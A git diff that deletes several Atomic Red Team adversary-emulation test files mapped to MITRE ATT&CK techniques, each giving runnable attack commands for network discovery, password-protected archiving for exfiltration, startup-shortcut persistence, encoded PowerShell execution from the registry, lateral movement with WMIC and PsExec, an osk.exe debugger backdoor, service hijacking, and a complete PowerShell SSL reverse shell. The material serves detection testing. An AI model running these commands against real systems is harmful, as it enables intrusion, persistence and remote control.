-- [Atomic Test #3 - Remote System Discovery - nltest](#atomic-test-3---remote-system-discovery---nltest)
-
-- [Atomic Test #4 - Remote System Discovery - ping sweep](#atomic-test-4---remote-system-discovery---ping-sweep)
-
-- [Atomic Test #5 - Remote System Discovery - arp](#atomic-test-5---remote-system-discovery---arp)
-
-- [Atomic Test #6 - Remote System Discovery - arp nix](#atomic-test-6---remote-system-discovery---arp-nix)
-
-- [Atomic Test #7 - Remote System Discovery - sweep](#atomic-test-7---remote-system-discovery---sweep)
-
-- [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup)
-
-
-<br/>
-
-## Atomic Test #1 - Remote System Discovery - net
-Identify remote systems with net.exe.
-
-Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net view /domain
-net view
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Remote System Discovery - net group Domain Computers
-Identify remote systems with net.exe querying the Active Directory Domain Computers group.
-
-Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net group "Domain Computers" /domain
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Remote System Discovery - nltest
-Identify domain controllers for specified domain.
-
-Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| target_domain | Domain to query for domain controllers | String | domain.local|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-nltest.exe /dclist:#{target_domain}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Remote System Discovery - ping sweep
-Identify remote systems via ping sweep.
-
-Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Remote System Discovery - arp
-Identify remote systems via arp. 
-
-Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-arp -a
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Remote System Discovery - arp nix
-Identify remote systems via arp.
-
-Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-arp -a | grep -v '^?'
-```
-
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if arp command exists on the machine
-##### Check Prereq Commands:
-```sh
-if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; 
-```
-##### Get Prereq Commands:
-```sh
-echo "Install arp on the machine."; exit 1;
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Remote System Discovery - sweep
-Identify remote systems via ping sweep.
-
-Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. 
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| subnet | Subnet used for ping sweep. | string | 192.168.1|
-| start_host | Subnet used for ping sweep. | string | 1|
-| stop_host | Subnet used for ping sweep. | string | 254|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Remote System Discovery - nslookup
-Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
-
-Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. 
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
-$pieces = $localip.split(".")
-$firstOctet = $pieces[0]
-$secondOctet = $pieces[1]
-$thirdOctet = $pieces[2]
-foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1022.md b/Atomic_Threat_Coverage/Triggers/T1022.md
deleted file mode 100644
index 133c482..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1022.md
+++ /dev/null
@@ -1,177 +0,0 @@
-# T1022 - Data Encrypted
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1022)
-<blockquote>Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
-
-Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Data Encrypted with zip and gpg symmetric](#atomic-test-1---data-encrypted-with-zip-and-gpg-symmetric)
-
-- [Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar](#atomic-test-2---compress-data-and-lock-with-password-for-exfiltration-with-winrar)
-
-- [Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip](#atomic-test-3---compress-data-and-lock-with-password-for-exfiltration-with-winzip)
-
-- [Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip](#atomic-test-4---compress-data-and-lock-with-password-for-exfiltration-with-7zip)
-
-
-<br/>
-
-## Atomic Test #1 - Data Encrypted with zip and gpg symmetric
-Encrypt data for exiltration
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_folder | Path used to store files. | Path | /tmp/T1022|
-| test_file | Temp file used to store encrypted data. | Path | T1022|
-| encryption_password | Password used to encrypt data. | string | InsertPasswordHere|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-mkdir -p #{test_folder}
-cd #{test_folder}; touch a b c d e f g
-zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
-echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
-ls -l #{test_folder}
-```
-
-#### Cleanup Commands:
-```sh
-rm -Rf #{test_folder}
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: 
-##### Check Prereq Commands:
-```sh
-if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; 
-```
-##### Get Prereq Commands:
-```sh
-echo "Install gpg and zip to run the test"; exit 1;
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar
-Note: Requires winrar installation
-rar a -p"blue" hello.rar (VARIANT)
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-mkdir .\tmp\victim-files
-cd .\tmp\victim-files
-echo "This file will be encrypted" > .\encrypted_file.txt
-rar a -hp"blue" hello.rar
-dir
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip
-Note: Requires winzip installation
-wzzip sample.zip -s"blueblue" *.txt (VARIANT)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%&#92;WinZip&#92;winzip64.exe|
-| winzip_url | Path to download Windows Credential Editor zip file | url | https://download.winzip.com/gl/nkln/winzip24-home.exe|
-| winzip_hash | File hash of the Windows Credential Editor zip file | String | B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-path=%path%;"C:\Program Files (x86)\winzip"
-mkdir .\tmp\victim-files
-cd .\tmp\victim-files
-echo "This file will be encrypted" > .\encrypted_file.txt
-"#{winzip_exe}" -min -a -s"hello" archive.zip *
-dir
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Winzip must be installed
-##### Check Prereq Commands:
-```powershell
-cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' 
-```
-##### Get Prereq Commands:
-```powershell
-if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
-  Write-Host Follow the installation prompts to continue
-  cmd /c "$env:Temp\winzip.exe"
-}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip
-Note: Requires 7zip installation
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-mkdir $PathToAtomicsFolder\T1022\victim-files
-cd $PathToAtomicsFolder\T1022\victim-files
-echo "This file will be encrypted" > .\encrypted_file.txt
-7z a archive.7z -pblue
-dir
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1023.md b/Atomic_Threat_Coverage/Triggers/T1023.md
deleted file mode 100644
index 3917672..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1023.md
+++ /dev/null
@@ -1,92 +0,0 @@
-# T1023 - Shortcut Modification
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1023)
-<blockquote>Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Shortcut Modification](#atomic-test-1---shortcut-modification)
-
-- [Atomic Test #2 - Create shortcut to cmd in startup folders](#atomic-test-2---create-shortcut-to-cmd-in-startup-folders)
-
-
-<br/>
-
-## Atomic Test #1 - Shortcut Modification
-This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
-gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
-Upon execution, calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| shortcut_file_path | shortcut modified and execute | path | %temp%&#92;T1023_modified_shortcut.url|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-echo [InternetShortcut] > #{shortcut_file_path}
-echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
-#{shortcut_file_path}
-```
-
-#### Cleanup Commands:
-```cmd
-del -f #{shortcut_file_path} >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Create shortcut to cmd in startup folders
-LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
-to view the new shortcut.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$Shell = New-Object -ComObject ("WScript.Shell")
-$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk")
-$ShortCut.TargetPath="cmd.exe"
-$ShortCut.WorkingDirectory = "C:\Windows\System32";
-$ShortCut.WindowStyle = 1;
-$ShortCut.Description = "T1023.";
-$ShortCut.Save()
-
-$Shell = New-Object -ComObject ("WScript.Shell")
-$ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk")
-$ShortCut.TargetPath="cmd.exe"
-$ShortCut.WorkingDirectory = "C:\Windows\System32";
-$ShortCut.WindowStyle = 1;
-$ShortCut.Description = "T1023.";
-$ShortCut.Save()
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore
-Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1027.md b/Atomic_Threat_Coverage/Triggers/T1027.md
deleted file mode 100644
index c4d5759..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1027.md
+++ /dev/null
@@ -1,128 +0,0 @@
-# T1027 - Obfuscated Files or Information
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027)
-<blockquote>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
-
-Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.
-
-Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
-
-Adversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)
-
-Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Decode base64 Data into Script](#atomic-test-1---decode-base64-data-into-script)
-
-- [Atomic Test #2 - Execute base64-encoded PowerShell](#atomic-test-2---execute-base64-encoded-powershell)
-
-- [Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry](#atomic-test-3---execute-base64-encoded-powershell-from-windows-registry)
-
-
-<br/>
-
-## Atomic Test #1 - Decode base64 Data into Script
-Creates a base64-encoded data file and decodes it into an executable shell script
-
-Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
-cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
-chmod +x /tmp/art.sh
-/tmp/art.sh
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Execute base64-encoded PowerShell
-Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
-
-Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$OriginalCommand = '#{powershell_command}'
-$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
-$EncodedCommand =[Convert]::ToBase64String($Bytes)
-$EncodedCommand
-powershell.exe -EncodedCommand $EncodedCommand
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry
-Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
-
-Upon successful execution, powershell will execute encoded command and read/write from the registry.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
-| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
-| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$OriginalCommand = '#{powershell_command}'
-$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
-$EncodedCommand =[Convert]::ToBase64String($Bytes)
-$EncodedCommand
-
-Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
-powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1028.md b/Atomic_Threat_Coverage/Triggers/T1028.md
deleted file mode 100644
index 7b192b2..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1028.md
+++ /dev/null
@@ -1,192 +0,0 @@
-# T1028 - Windows Remote Management
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
-<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)
-
-- [Atomic Test #2 - PowerShell Lateral Movement](#atomic-test-2---powershell-lateral-movement)
-
-- [Atomic Test #3 - WMIC Process Call Create](#atomic-test-3---wmic-process-call-create)
-
-- [Atomic Test #4 - Psexec](#atomic-test-4---psexec)
-
-- [Atomic Test #5 - Invoke-Command](#atomic-test-5---invoke-command)
-
-
-<br/>
-
-## Atomic Test #1 - Enable Windows Remote Management
-Powershell Enable WinRM
-
-Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Enable-PSRemoting -Force
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - PowerShell Lateral Movement
-Powershell lateral movement using the mmc20 application com object.
-
-Reference:
-
-https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
-
-Upon successful execution, cmd will spawn calc.exe on a remote computer.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| computer_name | Name of Computer | string | computer1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - WMIC Process Call Create
-Utilize WMIC to start remote process.
-
-Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_name | Username | String | DOMAIN&#92;Administrator|
-| password | Password | String | P@ssw0rd1|
-| computer_name | Target Computer Name | String | Target|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Psexec
-Utilize psexec to start remote process.
-
-Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_name | Username | String | DOMAIN&#92;Administrator|
-| password | Password | String | P@ssw0rd1|
-| computer_name | Target Computer Name | String | localhost|
-| psexec_exe | Path to PsExec | string | C:&#92;PSTools&#92;PsExec.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-#{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
-##### Check Prereq Commands:
-```cmd
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} 
-```
-##### Get Prereq Commands:
-```cmd
-Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
-Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
-New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
-Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Invoke-Command
-Execute Invoke-command on remote host.
-
-Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| host_name | Remote Windows Host Name | String | localhost|
-| remote_command | Command to execute on remote Host | String | ipconfig|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1030.md b/Atomic_Threat_Coverage/Triggers/T1030.md
deleted file mode 100644
index b8be89a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1030.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# T1030 - Data Transfer Size Limits
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
-<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)
-
-
-<br/>
-
-## Atomic Test #1 - Data Transfer Size Limits
-Take a file/directory, split it into 5Mb chunks
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
-| file_name | File name | Path | T1030_urandom|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cd #{folder_path}; split -b 5000000 #{file_name}
-ls -l #{folder_path}
-```
-
-#### Cleanup Commands:
-```sh
-if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: 
-##### Check Prereq Commands:
-```sh
-if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; 
-```
-##### Get Prereq Commands:
-```sh
-if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi;      
-dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1031.md b/Atomic_Threat_Coverage/Triggers/T1031.md
deleted file mode 100644
index c7a696c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1031.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# T1031 - Modify Existing Service
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1031)
-<blockquote>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).
-
-Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
-
-Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Modify Fax service to run PowerShell](#atomic-test-1---modify-fax-service-to-run-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Modify Fax service to run PowerShell
-This test will temporarily modify the service Fax by changing the binPath to PowerShell
-and will then revert the binPath change, restoring Fax to its original state.
-
-Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
-sc start Fax
-```
-
-#### Cleanup Commands:
-```cmd
-sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1032.md b/Atomic_Threat_Coverage/Triggers/T1032.md
deleted file mode 100644
index 08b6e2b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1032.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# T1032 - Standard Cryptographic Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1032)
-<blockquote>Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - OpenSSL C2](#atomic-test-1---openssl-c2)
-
-
-<br/>
-
-## Atomic Test #1 - OpenSSL C2
-Thanks to @OrOneEqualsOne for this quick C2 method.
-This is to test to see if a C2 session can be established using an SSL socket.
-More information about this technique, including how to set up the listener, can be found here:
-https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
-
-Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| server_ip | IP of the external server | String | 127.0.0.1|
-| server_port | The port to connect to on the external server | String | 443|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$server_ip = #{server_ip}
-$server_port = #{server_port}
-$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
-$stream = $socket.GetStream()
-$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
-$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
-$writer = new-object System.IO.StreamWriter($sslStream)
-$writer.Write('PS ' + (pwd).Path + '> ')
-$writer.flush()
-[byte[]]$bytes = 0..65535|%{0};
-while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
-{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
-$sendback = (iex $data | Out-String ) 2>&1;
-$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
-$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
-$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
-```
-
-
-
-
-
-
-<br/>
